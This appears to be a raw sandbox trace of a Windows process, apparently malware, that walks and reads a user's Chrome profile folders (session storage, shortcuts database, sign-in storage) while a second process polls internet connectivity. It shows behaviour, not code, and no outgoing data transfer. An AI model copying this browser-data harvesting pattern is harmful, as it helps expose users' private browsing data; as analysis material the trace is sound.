\xc4aQ\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00euserc\x90\x00\x00\x00\x00\x00\x00\x00\xf0\xd8:P\xe3\x91\xcf\x01\xf0\xd8:P\xe3\x91\xcf\x01\xf0\xd8:P\xe3\x91\xcf\x01\xf0\xd8:P\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00,\x00\x00\x00\x00\x00\x00\x00\x10\x00C\x00A\x00C\x00H\x00E\x00W\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00a\x00c\x00h\x00e\x00W\x00r\x00i\x00t\x00a\x00b\x00l\x00e\x00A\x00d\x00o\x00b\x00e\x00R\x00o\x00o\x00t\x00\x82ytabl\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:44:38,860 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:38,940 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\CacheWritableAdobeRoot\*.* |
SUCCESS | 0x0016be48 | |
| 07:44:38,940 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\xd8:P\xe3\x91\xcf\x01\xf0\xd8:P\xe3\x91\xcf\x01\xf0\xd8:P\xe3\x91\xcf\x01\xf0\xd8:P\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00H 0E y\x00\x00\x00\x00\x00\x00\x00\x00\xf0\xd8:P\xe3\x91\xcf\x01\xd0k|c\xe3\x91\xcf\x01P\xe7=P\xe3\x91\xcf\x01P\xe7=P\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x10\x00A\x00S\x00S\x00E\x00T\x00C\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00s\x00s\x00e\x00t\x00C\x00a\x00c\x00h\x00e\x00 |
SUCCESS | 0x00000000 | |
| 07:44:38,940 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:39,021 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\CacheWritableAdobeRoot\AssetCache\*.* |
SUCCESS | 0x0016be80 | |
| 07:44:39,021 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\xd8:P\xe3\x91\xcf\x01\xd0k|c\xe3\x91\xcf\x01P\xe7=P\xe3\x91\xcf\x01P\xe7=P\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\xa3\xa3\xa3\xa3\xa3\xa3\x00\x00\x00\x00\x00\x00\x00\x00P\xe7=P\xe3\x91\xcf\x01P\xe7=P\xe3\x91\xcf\x01P\xe7=P\xe3\x91\xcf\x01P\xe7=P\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00Q\x00M\x00V\x00L\x006\x002\x00X\x00W\x00 |
SUCCESS | 0x00000000 | |
| 07:44:39,021 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:39,101 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\CacheWritableAdobeRoot\AssetCache\QMVL62XW\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:39,101 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00P\xe7=P\xe3\x91\xcf\x01P\xe7=P\xe3\x91\xcf\x01P\xe7=P\xe3\x91\xcf\x01P\xe7=P\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:39,101 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:39,101 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:39,101 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:39,101 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:39,181 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\*.* |
SUCCESS | 0x0016be48 | |
| 07:44:39,181 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 \xc4aQ\xe3\x91\xcf\x01 \xc4aQ\xe3\x91\xcf\x01 \xc4aQ\xe3\x91\xcf\x01 \xc4aQ\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00H 0E y\x00\x00\x00\x00\x00\x00\x00\x00 \xc4aQ\xe3\x91\xcf\x01\xe0:\x8dc\xe3\x91\xcf\x01\xa0\xfdmQ\xe3\x91\xcf\x01\xa0\xfdmQ\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x10\x00#\x00S\x00H\x00A\x00R\x00E\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00#\x00S\x00h\x00a\x00r\x00e\x00d\x00O\x00b\x00j\x00e\x00c\x00t\x00s\x00 |
SUCCESS | 0x00000000 | |
| 07:44:39,181 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:39,261 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\*.* |
SUCCESS | 0x0016be80 | |
| 07:44:39,261 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 \xc4aQ\xe3\x91\xcf\x01\xe0:\x8dc\xe3\x91\xcf\x01\xa0\xfdmQ\xe3\x91\xcf\x01\xa0\xfdmQ\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\xa3\xa3\xa3\xa3\xa3\xa3\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xfdmQ\xe3\x91\xcf\x01\xa0\xfdmQ\xe3\x91\xcf\x01\xa0\xfdmQ\xe3\x91\xcf\x01\xa0\xfdmQ\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00D\x009\x004\x00C\x00C\x00Y\x00J\x003\x00 |
SUCCESS | 0x00000000 | |
| 07:44:39,261 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:39,341 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\D94CCYJ3\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:39,341 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0\xfdmQ\xe3\x91\xcf\x01\xa0\xfdmQ\xe3\x91\xcf\x01\xa0\xfdmQ\xe3\x91\xcf\x01\xa0\xfdmQ\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\xa3\xa3\xa3\xa3\xa3\xa3\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xfdmQ\xe3\x91\xcf\x01\xa0\xfdmQ\xe3\x91\xcf\x01\xa0\xfdmQ\xe3\x91\xcf\x01\xa0\xfdmQ\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00A\x00C\x00R\x00O\x00M\x00~\x001\x00.\x00C\x00O\x00M\x00m\x00a\x00c\x00r\x00o\x00m\x00e\x00d\x00i\x00a\x00.\x00c\x00o\x00m\x00 |
SUCCESS | 0x00000000 | |
| 07:44:39,341 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:39,391 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:39,391 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:39,391 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:39,391 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:39,391 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:39,421 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\D94CCYJ3\macromedia.com\*.* |
SUCCESS | 0x0016bfc0 | |
| 07:44:39,421 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0\xfdmQ\xe3\x91\xcf\x01\xa0\xfdmQ\xe3\x91\xcf\x01\xa0\xfdmQ\xe3\x91\xcf\x01\xa0\xfdmQ\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00e t a \x00\x00\x00\x00\x00\x00\x00\x00\xa0\xfdmQ\xe3\x91\xcf\x01\xa0\xfdmQ\xe3\x91\xcf\x01\xa0\xfdmQ\xe3\x91\xcf\x01\xa0\xfdmQ\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00s\x00u\x00p\x00p\x00o\x00r\x00t\x00 |
SUCCESS | 0x00000000 | |
| 07:44:39,421 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:39,501 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:39,501 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001d4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:39,501 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:39,501 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:39,501 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001bc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:39,501 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:39,501 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\README DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c8 |
SUCCESS | 0x00000000 | |
| 07:44:39,511 | 504 | NtReadFile |
Buffer => Google Chrome settings and storage represent user-selected preferences and information and MUST not be extracted, overwritten or modified except through Google Chrome defined APIs. FileHandle => 0x000001c8 |
SUCCESS | 0x00000000 | |
| 07:44:39,511 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c8 |
FAILURE | 3221225489 | |
| 07:44:39,511 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:39,601 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Session Storage\*.* |
SUCCESS | 0x0016bdd8 | |
| 07:44:39,601 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0\x1bQv\xe0\x91\xcf\x01\xd0\x1cc\xd9\xe4\x91\xcf\x01\xd0\x1cc\xd9\xe4\x91\xcf\x01\xd0\x1cc\xd9\xe4\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x000\x000\x000\x00x\x00\x00\x00\x00\x00\x00\x00P\xe3V\xd9\xe4\x91\xcf\x01\xa0\x95a\xd9\xe4\x91\xcf\x01\xa0\x95a\xd9\xe4\x91\xcf\x01\xa0\x95a\xd9\xe4\x91\xcf\x011\xe5\x01\x00\x00\x00\x00\x00\x00\xf0\x01\x00\x00\x00\x00\x00 \x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x000\x000\x000\x000\x005\x00.\x00l\x00d\x00b\x00F\x00l\x00a\x00x\x00\x00\x00\x00\x00\x00\x00\xd0\x1cc\xd9\xe4\x91\xcf\x01\xd0\xe9\x8d\xe1\xe7\x91\xcf\x01\xd0\xe9\x8d\xe1\xe7\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:39,611 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Session Storage\LOG DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:39,611 | 504 | NtReadFile |
Buffer => 2014/06/26-20:50:30.102 3968 Recovering log #3
2014/06/26-20:50:30.194 3968 Level-0 table #5: started
2014/06/26-20:50:30.274 3968 Level-0 table #5: 124209 bytes OK
2014/06/26-20:50:30.284 3968 Delete type=0 #3
2014/06/26-20:50:30.295 3968 Delete type= FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:39,611 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:44:39,611 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Session Storage\MANIFEST-000004 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:39,611 | 504 | NtReadFile |
Buffer => V\xf9\xb8\xf8\x1c\x00\x01\x01\x1aleveldb.BytewiseComparatorn\xd9.\x8b1\x00\x01\x02\x06 \x00\x03\x07\x04z\x07\x00\x05\xb1\xca\x07\x0emap-0-\x00s\x00\x00\x00\x00\x00\x00\x13next-map-id\x01\x03\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:39,621 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:44:39,621 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:39,621 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Shortcuts DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c8 |
SUCCESS | 0x00000000 | |
| 07:44:39,661 | 504 | NtReadFile |
Buffer => SQLite format 3\x00\x10\x00\x01\x01\x00@ \x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00-\xe2\x1e
\x0f\xfc\x00\x04
\xc8\x00\x0eY\x0f\xb7
\xc8\x0e0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001c8 |
SUCCESS | 0x00000000 | |
| 07:44:40,062 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c8 |
FAILURE | 3221225489 | |
| 07:44:40,072 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Shortcuts-journal DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c8 |
SUCCESS | 0x00000000 | |
| 07:44:40,112 | 504 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001c8 |
SUCCESS | 0x00000000 | |
| 07:44:40,162 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c8 |
FAILURE | 3221225489 | |
| 07:44:40,162 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b8 FileInformation => p\x00\x00\x00\x00\x00\x00\x00\x00?\xb9a\xe0\x91\xcf\x01\x10\xc0\xcfz\xe0\x91\xcf\x01\x00?\xb9a\xe0\x91\xcf\x01\x00?\xb9a\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00S\x00t\x00o\x00r\x00a\x00g\x00e\x00\x00\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00\xd0`@T\xe0\x91\xcf\x01\x90-\xf0@\xe5\x91\xcf\x01\x90-\xf0@\xe5\x91\xcf\x01\x90-\xf0@\xe5\x91\xcf\x01\x00P\x00\x00\x00\x00\x00\x00\x00P\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x10\x00T\x00O\x00P\x00S\x00I\x00T\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00T\x00o\x00p\x00 \x00S\x00i\x00t\x00e\x00s\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\xe8AT\xe0\x91\xcf\x01\x90-\xf0@\xe5\x91\xcf\x01\x90-\xf0@\xe5\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:40,162 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:40,192 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:40,192 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:40,192 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:40,192 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:40,192 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:40,242 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Storage\*.* |
SUCCESS | 0x0016bdd8 | |
| 07:44:40,242 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00?\xb9a\xe0\x91\xcf\x01\x10\xc0\xcfz\xe0\x91\xcf\x01\x00?\xb9a\xe0\x91\xcf\x01\x00?\xb9a\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x000\x000\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\xb9a\xe0\x91\xcf\x01\x10\xc0\xcfz\xe0\x91\xcf\x010\xc6\xbaa\xe0\x91\xcf\x010\xc6\xbaa\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00x\x00t\x00 |
SUCCESS | 0x00000000 | |
| 07:44:40,242 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:40,322 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Storage\ext\*.* |
SUCCESS | 0x0016be10 | |
| 07:44:40,322 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001bc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00?\xb9a\xe0\x91\xcf\x01\x10\xc0\xcfz\xe0\x91\xcf\x010\xc6\xbaa\xe0\x91\xcf\x010\xc6\xbaa\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x002CC58A\x00\x00\x00\x00\x00\x00\x00\x000\xc6\xbaa\xe0\x91\xcf\x01\x10\xc0\xcfz\xe0\x91\xcf\x01\xf0\xe2\xc0a\xe0\x91\xcf\x01\xf0\xe2\xc0a\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x10\x00C\x00H\x00R\x00O\x00M\x00E\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00c\x00h\x00r\x00o\x00m\x00e\x00-\x00s\x00i\x00g\x00n\x00i\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:40,322 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:40,403 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Storage\ext\chrome-signin\*.* |
SUCCESS | 0x0016be48 | |
| 07:44:40,403 | 504 | NtQueryDirectoryFile |
